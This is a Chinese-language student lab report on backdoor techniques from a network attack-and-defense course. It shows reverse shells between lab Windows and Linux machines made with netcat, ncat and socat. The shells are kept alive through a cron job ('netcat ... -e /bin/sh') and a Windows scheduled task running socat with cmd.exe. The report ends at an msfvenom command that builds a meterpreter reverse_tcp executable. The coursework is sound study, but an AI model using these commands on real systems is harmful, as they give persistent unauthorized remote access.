1. 程式人生 > 其它 >20192416《系統與網路攻防技術》實驗二實驗報告

20192416《系統與網路攻防技術》實驗二實驗報告

一、實驗原理

(一)後門
1.概念:後門程式一般是指那些繞過安全性控制而獲取對程式或系統訪問權的程式方法。在軟體的開發階段,程式設計師常常會在軟體內建立後門程式以便可以修改程式設計中的缺陷。但是,如果這些後門被其他人知道,或是在釋出軟體之前沒有刪除後門程式,那麼它就成了安全風險,容易被黑客當成漏洞進行攻擊。

二、實驗內容

(1)使用netcat獲取主機操作Shell,cron啟動
(2)使用socat獲取主機操作Shell, 任務計劃啟動
(3)使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
(4)使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell並寫入本實驗報告。

三、功能測試

1.Win獲得Linux Shell

1.1windows 開啟監聽

(1)首先通過命令ipconfig檢視主機IP地址,為192.168.56.1

(2)接著在主機命令列中輸入

ncat.exe -l -p 8888

進行監聽,其中的埠號8888可以自行修改,只要滿足主機和虛擬機器選擇的埠一致就行。

(3)windows下獲得一個linux shell,可執行任何指令,如pwd

2.Linux獲得Win Shell

(1)Linux執行監聽指令
首先檢視虛擬機器的IP地址,為192.168.31.53

接著執行監聽指令

nc -l -p 8888

(2)Windows反彈連線Linux
主機命令列中輸入

ncat.exe -e cmd.exe 192.168.31.53 8888

(3)Linux下看到Windows的命令提示
輸入ipconfig可以返回資訊,但有許多亂碼

3.nc傳輸資料

Windows端cmd輸入

nc.exe 192.168.43.44 2416 (192.168.43.44為linux的ip地址,2416為埠號)

Linux端輸入nc -l -p 2416 (在kali下監聽4321埠)
連線成功後輸入字元進行實驗結果驗證:

三、實驗內容

1.使用netcat獲取主機操作Shell,cron啟動

(1)在Linux下輸入 crontab -e 新增cron任務區,選擇編輯器3。
在最後一行新增

55 * * * * /bin/netcat 192.168.43.117 8888 -e /bin/sh 

其中的55 * * * *代表的是時間,分別為分鐘 小時 日期 月 周幾,後面為要執行的命令

然後ctrl+z,選擇Y 儲存並退出。(表示每小時的第55分鐘反向連結Windows主機的8888埠)

(2)在主機上監聽8888埠,到了55分就會有獲得一個shell。

以上,我們得到了一個最簡單的反彈式後門。

2.使用socat獲取主機操作Shell, 任務計劃啟動

(1)Windows->控制面板->管理工具->任務計劃程式->建立任務


名稱設為socat

觸發器——>新建——>選擇工作站鎖定時——>確定

操作——>新建——>填引數——>確定

程式或指令碼:socat的安裝路徑\socat\socat.exe
引數:tcp-listen:5319 exec:cmd.exe,pty,stderr

(2)快捷鍵“windows+l”鎖定計算機使用者,任務自動執行

(3)在Kali輸入

socat - tcp:192.168.1.102:5319

即可獲取shell

3.使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell

這裡我又更換了網路,主機地址為:172.16.219.37 虛擬機器地址為:172.16.220.10

(1)虛擬機器生成可執行檔案

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.219.37 LPORT=2416 -f exe > 20192416.exe